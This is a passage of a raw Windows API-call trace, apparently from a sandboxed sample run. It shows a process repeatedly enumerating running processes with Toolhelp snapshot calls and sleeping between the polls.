bowling ireland.exe")) returned 1 [0155.415] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0155.416] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0155.417] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0155.427] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0155.429] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0155.430] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0155.432] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0155.433] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0155.435] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0155.436] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0155.438] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0155.439] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0155.440] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0155.442] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0155.443] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0155.444] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0155.446] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0155.447] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.448] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0155.450] CloseHandle (hObject=0xc4) returned 1 [0155.450] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0155.456] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.457] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 
[0155.458] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0155.459] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0155.460] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0155.461] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0155.462] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0155.462] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0155.464] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0155.465] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0155.465] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.543] CloseHandle (hObject=0xbc) returned 1 [0155.543] Sleep (dwMilliseconds=0x12c) [0155.859] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0155.866] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.929] CloseHandle (hObject=0xc4) returned 1 [0155.929] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0155.935] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.033] CloseHandle (hObject=0xbc) returned 1 [0156.033] Sleep (dwMilliseconds=0x12c) [0156.337] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0156.342] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.378] CloseHandle (hObject=0xc4) returned 1 [0156.378] CreateToolhelp32Snapshot (dwFlags=0xf, 
th32ProcessID=0x0) returned 0xbc [0156.382] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.439] CloseHandle (hObject=0xbc) returned 1 [0156.439] Sleep (dwMilliseconds=0x12c) [0156.742] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0156.754] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.792] CloseHandle (hObject=0xc4) returned 1 [0156.792] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0156.799] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.900] CloseHandle (hObject=0xbc) returned 1 [0156.900] Sleep (dwMilliseconds=0x12c) [0157.211] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0157.217] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.258] CloseHandle (hObject=0xc4) returned 1 [0157.258] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0157.264] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, 
pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.360] CloseHandle (hObject=0xbc) returned 1 [0157.360] Sleep (dwMilliseconds=0x12c) [0157.664] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0157.670] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.718] CloseHandle (hObject=0xc4) returned 1 [0157.718] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0157.725] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.845] CloseHandle (hObject=0xbc) returned 1 [0157.845] Sleep (dwMilliseconds=0x12c) [0158.147] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0158.181] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.239] CloseHandle (hObject=0xc4) returned 1 [0158.239] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0158.247] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.396] CloseHandle (hObject=0xbc) returned 1 [0158.396] Sleep (dwMilliseconds=0x12c) [0158.739] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 
[0158.744] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.871] CloseHandle (hObject=0xc4) returned 1 [0158.871] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0158.875] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.987] CloseHandle (hObject=0xbc) returned 1 [0158.987] Sleep (dwMilliseconds=0x12c) [0159.289] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0159.295] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.376] CloseHandle (hObject=0xc4) returned 1 [0159.376] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0159.384] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.519] CloseHandle (hObject=0xbc) returned 1 [0159.519] Sleep (dwMilliseconds=0x12c) [0160.088] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0160.094] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, 
szExeFile="[System Process]")) returned 1 [0160.203] CloseHandle (hObject=0xc4) returned 1 [0160.203] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0160.209] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.304] CloseHandle (hObject=0xbc) returned 1 [0160.305] Sleep (dwMilliseconds=0x12c) [0160.889] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0160.901] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.026] CloseHandle (hObject=0xc4) returned 1 [0161.026] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0161.031] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.602] CloseHandle (hObject=0xbc) returned 1 [0161.602] Sleep (dwMilliseconds=0x12c) [0161.906] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0161.913] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.002] CloseHandle (hObject=0xc4) returned 1 [0162.002] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0162.008] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.135] CloseHandle (hObject=0xbc) returned 1 [0162.135] Sleep (dwMilliseconds=0x12c) [0162.528] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0162.534] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.737] CloseHandle (hObject=0xc4) returned 1 [0162.737] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0162.741] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.871] CloseHandle (hObject=0xbc) returned 1 [0162.871] Sleep (dwMilliseconds=0x12c) [0163.175] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0163.179] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.240] CloseHandle (hObject=0xc4) returned 1 [0163.240] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0163.245] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.336] CloseHandle 
(hObject=0xbc) returned 1 [0163.336] Sleep (dwMilliseconds=0x12c) [0167.184] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0167.231] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.425] CloseHandle (hObject=0xc4) returned 1 [0167.425] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0167.431] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.639] CloseHandle (hObject=0xbc) returned 1 [0167.639] Sleep (dwMilliseconds=0x12c) [0168.219] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0168.226] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.596] CloseHandle (hObject=0xc4) returned 1 [0168.596] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0168.812] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.065] CloseHandle (hObject=0xbc) returned 1 [0169.065] Sleep (dwMilliseconds=0x12c) [0169.564] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0169.580] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.743] CloseHandle (hObject=0xc4) returned 1 [0169.743] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0169.750] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.006] CloseHandle (hObject=0xbc) returned 1 [0170.006] Sleep (dwMilliseconds=0x12c) [0172.447] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0172.454] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.669] CloseHandle (hObject=0xc4) returned 1 [0172.669] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0172.674] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.789] CloseHandle (hObject=0xbc) returned 1 [0172.789] Sleep (dwMilliseconds=0x12c) [0173.101] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0173.106] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.265] CloseHandle (hObject=0xc4) returned 1 [0173.265] 
